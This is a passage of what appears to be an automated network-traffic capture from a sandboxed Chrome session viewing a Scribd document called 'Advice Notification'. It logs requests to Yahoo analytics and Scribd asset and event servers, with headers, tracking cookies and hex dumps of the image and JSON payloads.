                                                                                                                                                                                                                                                                                                                                                                                        x-response-time: 81
                                                                                                                                                                                                                                                                                                                                                                                        x-connection-hash: b576432c84ac4f62acc369c1293f8d1e30912f34efac708ad4fe25b70607d190
                                                                                                                                                                                                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        115192.168.2.164985554.171.122.264436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC939OUTGET /sp.pl?a=10000&d=Fri%2C%2006%20Dec%202024%2021%3A59%3A27%20GMT&n=5&b=Advice%20Notification%20%7C%20PDF&.yp=10143699&f=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&enc=UTF-8&gdpr=0&us_privacy=1-N-&gpp=DBACOe~CQJNnEAQJNnEAEXikAENA0EwAP_gAEPgACiQGpQCgAGgAcABoAEUAJgAUABHALhAXmA1IC84A4AHAAaABFACYAFAARwC8wAA~BQJNnEAQJNnEAEXikAENA0CgAf_AAIfAAAalAKAAaABwAGgARQAmABQAEcAuEBeYDUgLzgDgAcABoAEUAJgAUABHALzA~1-N-&gpp_sid=6&yv=1.16.5&tagmgr=gtm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: sp.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: A3=d=AQABBMpzU2cCEJV-opIdkuWyW4wVQ-qrcuUFEgEBAQHFVGddZ9xS0iMA_eMAAA&S=AQAAAvzM2plJnFSLK2ss9K56YLw
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, private, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Server: ATS/9.1.10.144
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Via: http/1.1 traffic_server (ApacheTrafficServer/9.1.10.144)
                                                                                                                                                                                                                                                                                                                                                                                        Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: A3=d=AQABBMpzU2cCEJV-opIdkuWyW4wVQ-qrcuUFEgEBAQHFVGddZ9xS0iMA_eMAAA&S=AQAAAvzM2plJnFSLK2ss9K56YLw; Expires=Sun, 7 Dec 2025 03:59:40 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        116192.168.2.1649859151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC411OUTGET /img/word_document/322011392/149x198/75a60db5ed/1732968212?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19990
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 64
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 554076
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100138-CHI, cache-ewr-kewr1740078-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 5, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.611428,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 71 74 78 6e 6f 74 1f 2e 5b 51 54 5b 1c 1f 32 4c 52 59 78 78 7a 2e 34 45 2a 36 64 2a 2d 41 cc ca d1 12 1d 44 fe fa e5 25 33 60 04 17 44 1b 28 35 55 59 60 fe fe fd 64 67 70 fd fc f6 36 44 6d 7b 7e 83 45 4f 59 36 3c 4b 30 3c 69 a0 a8 b2 5f 62 69 5a 5c 61 92 97 9b 0a 16 3a d5 d0 d2 ce b8 ad 5f 5f 61 42 45 4e f2 ef f2 bf c6 d2 c0 bd c3 45 4d 4f 87 8d 94 04 0a 30 8d 90 95 fd fa fd 63 63 66 04 0d 39 18 1a 31 a7 b5 c5 9d a0 ab 2b 39 68 9d ac be fd f1 e0 66 67 6c 4e 5d 6e 59 5d 66 d9 c3 b9 df d7 d5 0d 19 2f 67 6c 73 23 26 3a 43 48 59 5b 61 69 d6 c8 c9 cb bc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTEqtxnot.[QT[2LRYxxz.4E*6d*-AD%3`D(5UY`dgp6Dm{~EOY6<K0<i_biZ\a:__aBENEMO0ccf91+9hfglN]nY]f/gls#&:CHY[ai
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 89 b9 59 17 5a 37 6b 4c 06 e4 af db b6 db a2 e8 9a ad be 59 77 eb 16 d5 63 cd b6 f1 a2 6d 1a 01 3f 9d 16 db a6 5d 07 aa 35 1c 26 9a ad df 3e fa 6e cd 7c d7 ac f2 b4 e9 2c b2 d8 ae 59 4b 09 33 52 36 cd ad b5 dd e3 4a c2 be db 34 85 b9 a9 6d a0 02 da db d4 be 68 9b d6 8b a6 69 cc 4f 60 aa 28 fa 48 2c 1b 7e f3 0c 4c d5 75 ff 34 6c dd f6 55 05 3c 1d e7 6d b7 4d 4a 20 e8 8a 02 35 6a 1f b7 62 dd 88 4e 89 ae ed 8c 68 1f 1b 05 a5 2f 72 d5 41 11 75 22 6f 1f e1 08 b5 7d 6c 55 7e db ad 82 42 f6 b1 69 a4 7c 5c 39 69 81 2a 85 79 09 68 8d 85 1d 2b 9b da 0e 54 6b 57 a9 36 5d bb 15 1e ce aa 05 42 55 96 7c b6 fc 02 72 58 74 dd 96 73 50 05 a4 e2 40 d7 01 55 b7 de 6a 0d a3 a6 f7 75 db 2a d1 42 00 42 b3 d6 a2 5b 75 b9 c2 0e 94 76 b9 d8 76 cc 37 c0 0f 62 b6 5b a5 56 b7 8f 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: YZ7kLYwcm?]5&>n|,YK3R6J4mhiO`(H,~Lu4lU<mMJ 5jbNh/rAu"o}lU~Bi|\9i*yh+TkW6]BU|rXtsP@Uju*BB[uvv7b[V=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 9e ea ec f8 ec bf a1 5d 7d 8d 87 c3 79 bd 08 5c 50 8f c0 84 39 0d 99 8c 94 4d 2b 34 97 fc 00 50 d9 39 78 50 e6 3e d1 c3 93 3d b2 9f 48 a8 22 a0 7a 37 9a c3 ab 3c 3e e9 e0 19 02 e9 43 2a 27 3c a2 29 15 0c 1e bd f9 84 02 1c 7f f7 bb f7 81 eb b8 c7 7b c2 f5 04 ed ea 09 d7 8f 0b 68 45 f5 9c 04 b9 80 aa 2f 06 ea e1 95 05 ba 43 4a e6 cb fb d3 3a 26 63 07 5e 9f 94 07 bf 7e 4e 4e 2e 38 05 aa 3a 5b be 9b 8f e5 24 c1 56 24 d1 51 14 ac e4 25 ac a4 72 e8 a6 0f 6f 36 67 ef 31 6d 7f fa f6 cf bf ba 7b b8 7b b9 39 3e de 9c e1 f2 72 f3 f0 70 0c cb c3 f1 e6 f8 d5 e6 6e f3 ea e5 c3 f5 f5 5f 37 d7 3f 5f 5d 5f 5d 5d 6f 7e be be fe fb 3f e0 0a 75 0d ed 3d 88 d5 87 fa 17 1d 66 14 9a 56 9e 85 f1 2b e6 2a e6 a5 f6 2e d7 50 23 a1 26 9b 60 4b 13 ac 75 cb 6d ec 6e 89 d9 10 ec 6c 32
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]}y\P9M+4P9xP>=H"z7<>C*'<){hE/CJ:&c^~NN.8:[$V$Q%ro6g1m{{9>rpn_7?_]_]]o~?u=fV+*.P#&`Kumnl2
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: c2 d6 7a a5 72 dc 3a ea 0f aa 47 c5 e2 a0 d8 ed 7f d3 ed 82 ea 6f 95 ea ad f5 de ad 6c 36 0a c5 63 1e d1 98 35 1a 9a 34 13 86 31 43 54 b6 45 29 51 e8 75 14 26 62 8d de a6 1a b3 e9 cd 54 d2 a0 63 f5 63 4b 4b 2e 69 c9 62 09 94 64 3e 52 d4 6a ab a8 60 b8 56 8f a0 78 78 a0 7e 28 5a c6 13 0f 04 e2 e2 4c 20 8e ab c7 e3 f1 7a 13 cf 9a cf 86 87 87 87 ad 16 74 95 6d 1d b6 da b0 04 62 0e dd 4a a5 d2 cb 3a 7a 85 2d 60 b1 a4 d7 a8 35 38 72 16 8a b3 f8 69 7a 71 c2 a5 d4 cb cd 66 32 c1 c9 b0 16 40 fb 28 e2 25 9b 1e 9b 41 ce a0 1d fb 13 2d 41 f9 1f a4 49 f3 5d fd e4 8c 52 33 ae 5f 58 25 88 78 e9 c1 8b 44 f1 01 e9 e2 8c 7b 66 66 32 e1 70 b3 09 ad e7 b3 40 cb 67 b3 ad f6 e7 68 b5 b2 5b 24 b2 b2 12 aa c6 71 1a 9b 4d 43 5e 32 f0 4f 68 ca 25 27 5e 49 9a 09 66 7e 5a 83 22 aa
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zr:Gol6c541CTE)Qu&bTccKK.ibd>Rj`Vxx~(ZL ztmbJ:z-`58rizqf2@(%A-AI]R3_X%xD{ff2p@gh[$qMC^2Oh%'^If~Z"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 8f 1f 6d 9b aa d5 b6 bf 8c e0 1b 64 95 61 b0 58 a9 44 2f 76 ca a5 1c c2 b7 8b 18 82 6a 6d 9c 9d 2e d4 f2 bf ef 63 7e 98 c3 d6 80 59 58 14 71 d5 6a 1e f0 51 00 9f d3 54 88 7a c4 2c d6 fa cc 53 00 30 c5 57 e4 73 08 92 20 ed 92 81 ec 92 99 30 cb 3c 3c 3c e5 be a2 34 02 d5 b3 ff 00 85 53 41 db 1c 46 03 bd 6d 1b 16 4f f3 ae b1 e3 b0 80 7f 44 6e f3 d3 11 e1 ec 22 b0 c2 e1 b5 a7 6f b9 e5 31 6d 79 17 68 01 02 59 10 a3 7d 0b 01 9b 73 fd 44 77 25 30 26 b7 6e bf 94 4b 68 c4 38 64 a9 04 9f ef 74 fd 7e 4d d8 1d c0 e0 ac 7b 36 48 3f 00 e7 f4 74 f3 14 fe d9 74 a9 9e 7d 5c e7 54 2f 2c 13 ef 70 2c 4a 6d 5d df 31 b8 28 a8 46 77 cb 66 7d 63 ab db 55 bb c0 82 09 b9 a2 4b f5 f4 e9 db a7 6b 6b 6f 17 16 7c 9e 5a 10 c3 79 0b 1f b0 a0 d7 a5 42 9a 41 29 16 3d ad 5a e3 4b 19 f5 8c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mdaXD/vjm.c~YXqjQTz,S0Ws 0<<<4SAFmODn"o1myhY}sDw%0&nKh8dt~M{6H?tt}\T/,p,Jm]1(Fwf}cUKkko|ZyBA)=ZK
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: a9 48 06 e1 ce d9 2c 8a 1a e8 27 64 35 c0 2c 0d 79 de 05 1d 0e d1 d6 34 50 d9 e4 b3 a6 91 95 e5 3b 8e 45 79 75 c6 be ff 0f eb 08 11 1c be a1 bc 52 e2 b1 68 34 5c b9 39 38 b0 d8 8c 89 db 5a af b7 40 fa ce 3b 8f e7 f9 5f 3d c8 75 51 bc e3 54 75 55 d5 5c d5 5c 02 d5 3a 96 02 82 5a c6 ce 62 b1 54 3b d0 ef 27 12 72 df 46 1d 20 b1 46 cc c1 3c 21 b4 51 b1 96 15 00 9c e6 c4 fb fd 3b 8e c5 b3 fd 3b b0 86 43 57 40 79 0d 0e 7d fb d0 ab 40 2a ec dc dc 7c b8 71 ac 1b d0 ac ae ae d2 b5 7a d3 0b f5 82 3d 17 cb 87 15 51 f4 22 b3 5a 3b 94 56 fe ba eb 2b 72 96 c3 30 ed 72 aa 62 4e 10 52 8c 8d e2 f1 04 19 c7 ea 96 62 b6 13 13 d0 25 e9 c7 4d 66 c7 52 31 e7 53 a0 d9 ef cb a0 9a cf 33 0b ad 4f 27 2c 4e d5 60 2c df 68 e4 ad 7d a5 a9 b5 53 61 cb fc 70 73 65 dd 73 a8 0b 20 5d bc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: H,'d5,y4P;EyuRh4\98Z@;_=uQTuU\\:ZbT;'rF F<!Q;;CW@y}@*|qz=Q"Z;V+r0rbNRb%MfR1S3O',N`,h}Sapses ]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 50 88 01 4d 0c 0e d6 63 8a fb 68 58 e2 3d a3 71 b0 9e b0 16 97 96 16 a9 0e 41 15 40 be 53 03 2a 7b a3 bb dc aa c5 9e 51 07 ea 48 64 e9 8e a9 54 4a 24 4a 52 38 d8 40 97 96 b3 58 2a 31 ba 92 46 7a 8f c8 68 55 45 51 ff 1a c7 f9 05 4e e0 1a b0 7e 35 66 24 18 a8 ea 88 ca a8 54 32 28 99 6a 50 a2 f2 32 b5 88 0a b3 4b af 17 45 93 09 89 cb 8c b2 0a 4b 68 09 80 0a 69 75 29 9d 4e 24 b0 9b 35 15 4d 78 74 d3 5f 5a 27 53 c9 44 e2 79 34 0a 85 ee ac 8d f3 db ce 86 4b 1e cd 46 d2 95 64 c1 dc 8b dd 1c 27 08 42 2c 16 ab bd 7d 68 cf 69 24 18 95 26 a8 7a 68 68 ae af 6f 12 11 13 33 3c e4 2c 8c 46 d4 a0 91 3a 96 5e 34 b9 a9 a8 01 b6 44 89 c5 b4 02 55 07 36 8d 8e a2 c9 44 8d 00 4c a0 02 b6 9b ba 2e 4d 4f 80 cc d8 38 21 86 4f 16 ba 02 9a 2d ac 12 61 2d ba 17 6b a1 53 68 d5 66 e3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PMchX=qA@S*{QHdTJ$JR8@X*1FzhUEQN~5f$T2(jP2KEKhiu)N$5Mxt_Z'SDy4KFd'B,}hi$&zhho3<,F:^4DU6DL.MO8!O-a-kShf
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 8c 9d ea 06 aa 40 8e cf 4f ff e7 bf 77 ed 41 4a 2c 5b f7 98 e4 1b 09 8b ad a2 4e f2 a4 74 29 8b ba 3b a8 66 14 df 4b a5 d0 e0 67 60 a0 8a 15 41 5a 95 4a fa 43 dd 30 ce 2e c6 b5 45 65 0e b7 d7 0a 7c 34 9a e7 f9 78 88 3b 3e f2 b9 a1 de a0 54 1b bd ae 62 06 7d 01 a1 3c bc 8b f2 d1 36 9d d7 a6 0a 41 bb 8d 8e d7 66 6f 91 07 90 c1 48 33 51 9c 63 ee 3d 72 47 cf a8 ac 81 ed 5a 0d 6c 87 03 13 82 5e 4a e7 9d 85 50 28 d8 84 ba 70 b1 1b 95 32 56 53 f8 e1 fd 6b bb b8 10 7a 51 2a 15 f7 5f b8 31 fe f7 07 8f fa d1 49 7d ae e2 8b 33 4a 16 0d 6f d3 22 c7 92 39 3e 97 b4 b1 2a 86 1d 9b 0d c0 3a 89 22 dd a3 10 89 49 94 b6 85 91 79 07 a5 bb a1 cc 7a 66 5b 09 0e 20 24 32 3a aa aa da b7 0f 50 03 99 b4 33 ef cc 05 ed ab cf 75 e6 4c dd e5 aa 96 cb a0 42 13 6d f6 75 f6 7f fc f1 81
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: @OwAJ,[Nt);fKg`AZJC0.Ee|4x;>Tb}<6AfoH3Qc=rGZl^JP(p2VSkzQ*_1I}3Jo"9>*:"Iyzf[ $2:P3uLBmu
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 9a 89 07 35 f1 45 86 66 34 6a 75 44 cf 31 49 24 e8 10 87 9a 13 a8 f5 b4 87 a5 5a 5c 59 59 56 09 05 7b e0 6d e3 7b 0e 51 93 ff 3c 51 6a 77 f8 7c f6 67 76 08 45 98 0f 3f 4b b4 dc 68 b9 d3 d6 a0 0d 34 5a 8c 0f 4e c0 5e a5 a7 f4 7b 02 ab a6 30 ea 7b cc 8d 11 38 41 34 39 ab 80 ea 3b 95 5e a5 52 d9 6c 36 d0 8a 46 54 74 90 61 18 4f 50 c4 ac 8b e7 6e e8 4c 15 e5 2e b0 42 8d b0 0d 82 f1 3c ae 1f b6 67 4b 15 50 0d fd 1f aa 0c 36 c6 61 23 90 62 ff 9b d1 ee cb b6 20 ad 14 76 45 1f 29 c0 89 a2 1b 37 5a 92 da 0b 8d 81 80 d9 58 fa a0 d1 d0 68 38 e2 25 f9 d9 24 56 ed 66 a9 c4 04 e9 2e 86 ef 58 d2 23 24 db 02 50 b1 58 74 be 07 c4 12 89 34 f9 9a 03 1b 77 ad 4d 55 e7 eb d9 92 42 cd 96 25 38 24 ee 1e 1c 44 5d 3a a0 2a 46 54 ef b1 00 85 7b 47 d3 4b 19 e7 86 bf 18 2b cf 36 18
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5Ef4juD1I$Z\YYV{m{Q<Qjw|gvE?Kh4ZN^{0{8A49;^Rl6FTtaOPnL.B<gKP6a#b vE)7ZXh8%$Vf.X#$PXt4wMUB%8$D]:*FT{GK+6
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 12 66 d6 dc c5 b8 18 df 3c 06 27 87 89 78 5c 54 5e be 96 07 a9 4b 2c 87 36 3a c8 51 9d 41 62 95 e3 42 0d e3 d1 d7 b3 54 f5 cd 69 bd cd 68 dc 12 dd 66 3e d9 db cb 63 3f 65 99 8e 1e 6d 2d ac 6f 85 3f e4 68 7c b5 61 78 7a b6 a5 d8 70 55 a1 48 8f 29 fb fa 72 52 00 8a 14 08 04 38 99 b4 63 74 fa c5 5d 79 c3 fd 97 d3 63 40 85 63 15 bb 2a 5d 98 d8 85 11 2c 15 8e 9b 07 5e 20 2a 46 53 2e bc 16 85 c5 99 53 0a a8 3c 9e a0 06 a0 58 b1 ca 09 21 ec 04 39 2a b9 bc 1e 8d 33 a1 d1 09 e0 2a 5c a1 4a c4 e9 2e 0e 1d a9 97 37 3c 3d d6 52 fa 6c 66 26 c6 8f 29 61 db 9e 92 ce c7 30 02 f6 c7 4d 7b 77 8f 6e 7a b2 af 59 7e 73 74 fe d1 41 b4 ee 89 49 3f 85 8b 5d 04 4b 85 61 e5 de d7 13 b3 b3 13 91 ff 51 71 7e 31 4d e4 5b 1c 2f 76 29 e2 84 56 5d b7 35 ae c3 a5 5c 70 84 72 af c6 8a 95
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: f<'x\T^K,6:QAbBTihf>c?em-o?h|axzpUH)rR8ct]yc@c*],^ *FS.S<X!9*3*\J.7<=Rlf&)a0M{wnzY~stAI?]KaQq~1M[/v)V]5\pr


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        117192.168.2.1649857151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC3065OUTPOST /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1649
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1649OUTData Raw: 7b 22 64 6f 63 5f 69 64 22 3a 38 30 31 35 31 39 32 39 31 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 66 6f 75 72 67 65 6e 2e 76 69 65 77 63 68 61 6e 67 65 22 2c 22 76 61 6c 75 65 22 3a 22 5b 5b 2d 30 2e 30 35 2c 31 2e 36 36 5d 2c 5b 31 2e 30 35 2c 32 5d 5d 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 33 30 2e 30 35 30 5a 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 72 76 22 2c 22 76 61 6c 75 65 22 3a 22 7b 5c 22 72 69 5c 22 3a 5c 22 73 62 64 2f 55 56 76 74 34 4e 46 74 44 63 4b 58 51 69 37 5a 69 46 79 34 66 38 77 3d 5c 22 2c 5c 22 76 69 5c 22 3a 5c 22 38 64 34 62 33 64 64 31 2d 36 32 38 37 2d 34 35 64 38 2d 62 65 31 65 2d 31 34 37 64 30 39 62 65 63 37 37 38 2e 30 5c 22 7d 22 2c 22 74 69 6d 65 73 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"doc_id":801519291,"events":[{"name":"fourgen.viewchange","value":"[[-0.05,1.66],[1.05,2]]","timestamp":"2024-12-06T21:59:30.050Z"},{"name":"rv","value":"{\"ri\":\"sbd/UVvt4NFtDcKXQi7ZiFy4f8w=\",\"vi\":\"8d4b3dd1-6287-45d8-be1e-147d09bec778.0\"}","timest
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
